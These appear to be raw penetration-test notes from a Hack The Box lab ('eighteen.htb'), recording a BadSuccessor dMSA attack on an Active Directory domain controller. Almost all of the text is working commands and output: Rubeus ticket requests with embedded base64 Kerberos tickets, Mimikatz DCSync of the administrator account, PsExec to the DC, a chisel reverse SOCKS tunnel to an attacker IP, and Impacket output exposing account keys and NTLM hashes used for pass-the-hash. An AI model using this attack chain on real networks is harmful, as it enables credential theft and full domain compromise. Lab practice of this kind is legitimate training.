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
./Rubeus.exe asktgs /user:attacker_dmsa$ /service:krbtgt/eighteen.htb /opsec /dmsa /nowrap /ptt /ticket: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
./Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/DC01.eighteen.htb /opsec /dmsa /nowrap /ptt /ticket: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
./Rubeus.exe asktgs /user:attacker_dmsa$ /service:ldap/DC01.eighteen.htb /opsec /dmsa /nowrap /ptt /ticket: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
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:eighteen.htb /user:administrator" "exit"'
./Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/dc01.eighteen.htb /opsec /dmsa /nowrap /ptt /ticket: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
./PsExec.exe \\dc01.eighteen.htb PowerShell
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:eighteen.htb /user:administrator" "exit"'
https://medium.com/@chaoskist/hacksmarter-org-write-up-midgarden2-badsuccessor-exploitation-caf53d14bd9b
./chisel server -p 9998 --reverse
./chisel.exe client --max-retry-count=1 10.10.15.173:9998 R:1080:socks
proxychains4.conf:
socks5 127.0.0.1 1080
proxychains4 nxc ldap 10.10.11.95 -u adam.scott -p iloveyou1
proxychains4 faketime -f $(ntpdate -q dc01.eighteen.htb | awk '{print $4}') bash
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 python3 getST.py 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# systemctl stop systemd-timesyncd.service
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# sudo timedatectl set-time "$(date -d "$(curl -s -I http://10.10.11.95 | grep -i '^Date:' | cut -d' ' -f2-)" '+%Y-%m-%d %H:%M:%S')"
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# sudo timedatectl set-time "$(date -d "$(curl -s -I http://10.10.11.95 | grep -i '^Date:' | cut -d' ' -f2-)" '+%Y-%m-%d %H:%M:%S')"
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 python3 getST.py 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[*] Impersonating attacker_dMSA$
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:88 ... OK
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:9d97ddd9696caf6ea2f3915081b73858c80c3c9db4fc16fec6c455c05ced7fcd
[*] EncryptionTypes.rc4_hmac:5197b8c62290d67df48a5c447f4bcc2e
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec
[*] Saving ticket in attacker_dMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 python3 getST.py 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[*] Impersonating attacker_dMSA$
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:88 ... OK
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:d80afe2961047372dbeb96d27de227da61c3d916e5efcd07f79e5b2dd86a650b
[*] EncryptionTypes.rc4_hmac:16bf641def118ba70c1d5a3d6b6baa5d
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec
[*] Saving ticket in attacker_dMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
attacker_dMSA$:16bf641def118ba70c1d5a3d6b6baa5d
proxychains4 nxc smb eighteen.htb -u 'attacker_dMSA$' -H 16bf641def118ba70c1d5a3d6b6baa5d
export KRB5CCNAME='attacker_dMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache'
proxychains4 python3 getST.py -dc-ip 10.10.11.95 -spn 'cifs/DC01.eighteen.htb' 'eighteen.htb/attacker_dmsa$' -k -no-pass
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 nxc smb eighteen.htb -u 'attacker_dMSA$' -H 16bf641def118ba70c1d5a3d6b6baa5d
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:135 ... OK
SMB 10.10.11.95 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:eighteen.htb) (signing:True) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
